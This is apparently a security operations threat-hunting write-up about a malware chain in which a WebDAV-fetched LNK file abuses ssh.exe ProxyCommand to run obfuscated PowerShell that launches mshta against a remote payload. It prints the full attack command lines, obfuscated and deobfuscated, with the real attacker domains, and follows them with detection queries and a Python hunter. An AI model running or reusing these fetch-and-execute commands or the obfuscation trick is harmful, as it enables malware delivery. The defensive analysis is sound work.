Hunter-Case-01 - SSH Proxy Command Lolbas

  • Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads

1.) Information

Hunter Blue's day started with an interesting case: we first saw it on one infected device and later on many others, and it was neither prevented, detected nor alerted by the XDR system.

This is why you should always check the initial entry point of a malware infection and not blindly trust the detections of EDR or XDR systems alone.

Investigate the initial entry and execution, then search through the logs with these IoCs / IoAs to find the right artifacts for threat hunting.

2.) Attack Chain

Other Seen Infection Chains from our Cases

3.) Initial Access

UPDATE 06122024: In the case we saw in the SOC, the user was browsing the internet searching for manuals, found a PDF link, clicked on it and thereby started the initial infection chain.

Infection chain in which the user first downloaded an LNK file (via the rundll32.exe WebDAV method).

The LNK file runs ssh.exe (C:\Windows\System32\OpenSSH\ssh.exe) with the following parameter:

"-o ProxyCommand= "powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]' -replace']')".

  • Obfuscated Powershell

The PowerShell command spawns mshta.exe, which then downloads and executes additional code on the host:

mshta.exe hxxps[:]//berb.fitnessclub-filmfanatics.com/z[.]mp4

  • Malicious mp4 File Downloaded

#Rundll32.exe downloading a LNK File
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop@SSL https://download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk

#LNK File
Windows\System32\OpenSSH\ssh.exe -o ProxyCommand=".....

executing

#Powershell Obfuscated Command
Process : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Started with CMD : powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]'  -replace ']')


#Deobfuscated Command
Process : C:\Windows\System32\mshta.exe Started with CMD : "C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4

4.) Finding through Threat Hunting

  • The PowerShell script was blocked by the XDR system, but if you only trust this event you will miss the golden information behind this attack.

  • We hunted through the data lake logs of the whole infrastructure and, yes, you guessed it, we found another host executing the same command to download the malicious file from this WebDAV server. Nothing was detected or blocked until the obfuscated PowerShell execution.

5.) Mitigation

6.) Detection and Hunting

  • Hunting for malicious "ProxyCommand=" values within the SSH arguments.

  • Hunting for davclnt.dll,DavSetCookie download commands should definitely be performed in your environment -> see the executed command above.

  • My colleague from the Incident Response team also explained this in his blog post: https://dfir.ch/posts/search-ms_protocol_handler/ if you want to see how such commands are misused by threat actors.

  • Specific indicators include the use of the search-ms URI protocol in HTML files, unexpected pop-ups requesting access to Windows Explorer, and subsequent attempts to access remote servers using the WebDAV protocol.

  • Monitoring for the creation or execution of LNK files pointing to batch scripts will also be a focus.
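The two hunting ideas above (ProxyCommand= in ssh.exe arguments, davclnt.dll,DavSetCookie in rundll32.exe) and the `-replace ']'` padding trick from section 3 can be checked offline against exported process events. The following is an added example (not code from the original case write-up); the sample events are constructed, the domain dl.example.invalid is a placeholder, and a legitimate `ssh -W` ProxyCommand is included to show that plain ProxyCommand use is not flagged on its own.

```python
import re

# Constructed sample process-creation events (filename, command line); not telemetry
# from the case. The padded literal mirrors the ('...' -replace ']') trick from section 3.
SAMPLE_EVENTS = [
    ("rundll32.exe", 'rundll32.exe C:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie '
                     'dl.example.invalid@SSL https://dl.example.invalid/Downloads/Instruction.PDF.lnk'),
    ("ssh.exe", '"C:\\Windows\\System32\\OpenSSH\\ssh.exe" -o ProxyCommand="powershell powershell '
                "-Command ('msh]]]t]]a.e]]]xe ]]ht]]tps:]]//dl.e]]xample.in]]valid/z.]]mp4' -replace ']')\""),
    ("svchost.exe", 'C:\\Windows\\system32\\svchost.exe -k LocalService -p -s WebClient'),
    ("ssh.exe", 'ssh.exe -o ProxyCommand="ssh -W %h:%p jumphost" user@internal-box'),  # benign use
]

# ('<padded literal>' -replace '<pad char>') as it appears inside powershell -Command
REPLACE_TRICK = re.compile(r"\('([^']*)'\s+-replace\s*'([^']+)'\)")

def deobfuscate_replace(cmdline):
    """Undo the -replace padding: drop every padding character from the quoted
    literal, as PowerShell does at runtime. Returns None if the pattern is absent."""
    m = REPLACE_TRICK.search(cmdline)
    if not m:
        return None
    literal, pad = m.group(1), m.group(2)
    return literal.replace(pad, "")

def hunt(events):
    """Return (filename, reason, evidence) tuples for the three behaviours of the case:
    WebDAV LNK fetch via DavSetCookie, ssh ProxyCommand spawning a shell/LOLBin, and a
    padded PowerShell literal that resolves to mshta plus a URL."""
    hits = []
    for fname, cmd in events:
        low = cmd.lower()
        if fname.lower() == "rundll32.exe" and "davclnt.dll,davsetcookie" in low \
                and re.search(r"@ssl|@80", low):
            hits.append((fname, "webdav_davsetcookie", cmd))
        if fname.lower() == "ssh.exe" and "proxycommand=" in low \
                and re.search(r"powershell|cmd\.exe|mshta", low):
            hits.append((fname, "ssh_proxycommand_lolbas", cmd))
        plain = deobfuscate_replace(cmd)
        if plain and re.search(r"mshta(\.exe)?\s+https?://", plain, re.I):
            hits.append((fname, "padded_mshta_download", plain))
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```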

6.1) Sigma Rules

6.2) Yara Rules

6.3) Hunting Queries Tanium

#This query detects processes where `rundll32.exe` is used to execute `davclnt.dll`, often associated with WebDAV activity.
#The svchost.exe pattern matches the WebClient service host: C:\Windows\system32\svchost.exe -k LocalService -p -s WebClient
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*DavSetCookie.*","","",""] from all machines with Is Windows contains true
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*davclnt.dll.*","","",""] from all machines with Is Windows contains true

6.4) Hunting Queries Defender XDR

#This query detects processes where `rundll32.exe` is used to execute `davclnt.dll`, often associated with WebDAV activity.
#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where ProcessCommandLine contains 'rundll32.exe' and ProcessCommandLine contains 'davclnt.dll'
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessCommandLine, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

#use it also without @SSL and with @80 in Commandline
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

#use it also without @SSL and with @80 in Commandline
#narrower variant: excludes a known internal host ("Interner-Server" is a placeholder, adapt it to your environment) and keeps only cloudflare-fronted WebDAV hosts
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| where ProcessCommandLine !contains "Interner-Server"
| where ProcessCommandLine contains "cloudflare"
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName


7.) Conclusion and Learning for a Hunter Blue

  • The EDR on this host didn't pick up the malicious WebDAV commands, showcasing how fruitful threat hunting can be.
